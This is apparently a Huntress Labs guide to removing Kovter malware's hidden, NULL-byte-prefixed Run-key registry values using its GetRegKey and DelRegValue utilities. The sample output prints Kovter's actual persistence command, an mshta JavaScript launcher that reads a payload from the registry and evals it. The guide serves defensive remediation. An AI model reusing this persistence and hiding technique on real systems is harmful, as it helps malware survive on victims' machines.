Removing Kovter's Hidden Registry Values

NOTE: These instructions are meant to be used in conjunction with the Huntress incident report for Kovter. This specifically covers removing the "hidden" registry values used to start Kovter when a user logs in to the computer. There may be other components of the infection that need to be removed as well. Those are detailed in the Huntress remediation recommendation.

Kovter is a type of "fileless" malware, meaning there are no malicious files stored on the system. Instead, it uses legitimate Windows executables to start malicious JavaScript stored in the registry.

Kovter is tricky to remove due to the way it hides and its self-defense mechanisms--namely re-adding its startup values (registry values and other files) when it detects that they are no longer present.

The latest variant of Kovter hides inside of an "explorer.exe" process. On 64-bit hosts it is easy to spot because it uses a 32-bit "explorer.exe." Before attempting to remove Kovter you need to ensure that the process is no longer running. You can test this by deleting one of the files noted in the remediation recommendation. After deleting the file, refresh the Explorer window to ensure that the file did not reappear.

Note: We've seen Kovter variants hide inside rundll32.exe, mshta.exe, powershell.exe, and regsvr32.exe processes.

Removing the hidden registry values

Kovter hides in the registry by using value names that begin with a "\x00" (NULL) byte. If you navigate to a key that contains a value with a NULL byte you'll see:

Huntress Labs provides two utilities for removing Kovter related registry values:

  • GetRegKey.exe displays all the values within a single registry key.
  • DelRegValue.exe removes a single registry value.

Download this zip file. Inside are the two registry utilities (both 32- and 64-bit versions of the utilities).

Use GetRegKey.exe to view the values inside the run key specified in the remediation recommendation. Take note of "value 0"; that is a Kovter related value. You cannot see it in RegEdit.exe because of the "\x00" (NULL byte) at the beginning of the value name.

C:\Users\admin\Desktop\GetRegKey.exe HKU\S-1-5-21-1370328085-2576435830-1843890766-1001\Software\Microsoft\Windows\CurrentVersion\Run

Dumping key:  HKU\S-1-5-21-1370328085-2576435830-1843890766-1001\Software\Microsoft\Windows\CurrentVersion\Run
number of values: 2

value: 0
name (escaped): "\x00jaarhnxzja"
data (escaped): "\"C:\\Windows\\system32\\mshta.exe\" javascript:iMM5p3EsC=\"Fmk6iP5\";X00w=new%20ActiveXObject(\"WScript.Shell\");m2ynpg8nM=\"AjNuDp\";PIVd6=X00w.RegRead(\"HKCU\\\\software\\\\znhftxw\\\\ardb\");W1KiL8=\"5jMU\";eval(PIVd6);r2ZqC0=\"OFXnKsx\";"

value: 1
name (escaped): "VMware User Process"
data (escaped): "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"

Use DelRegValue.exe to remove the value. Replace the "\x00" in the name with the word "NULL":
In this example "\x00jaarhnxzja" becomes "NULLjaarhnxzja"

C:\Users\admin\Desktop\DelRegValue.exe HKU\S-1-5-21-1370328085-2576435830-1843890766-1001\Software\Microsoft\Windows\CurrentVersion\Run NULLjaarhnxzja

Deleting value:
Key:  HKU\S-1-5-21-1370328085-2576435830-1843890766-1001\Software\Microsoft\Windows\CurrentVersion\Run
Name:  jaarhnxzja
* successfully removed value

Run GetRegKey.exe to verify the value was removed:

C:\Users\admin\Desktop\GetRegKey.exe HKU\S-1-5-21-1370328085-2576435830-1843890766-1001\Software\Microsoft\Windows\CurrentVersion\Run

Dumping key:  HKU\S-1-5-21-1370328085-2576435830-1843890766-1001\Software\Microsoft\Windows\CurrentVersion\Run
number of values: 1

value: 0
name (escaped): "VMware User Process"
data (escaped): "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"

Still need help? Contact Us Contact Us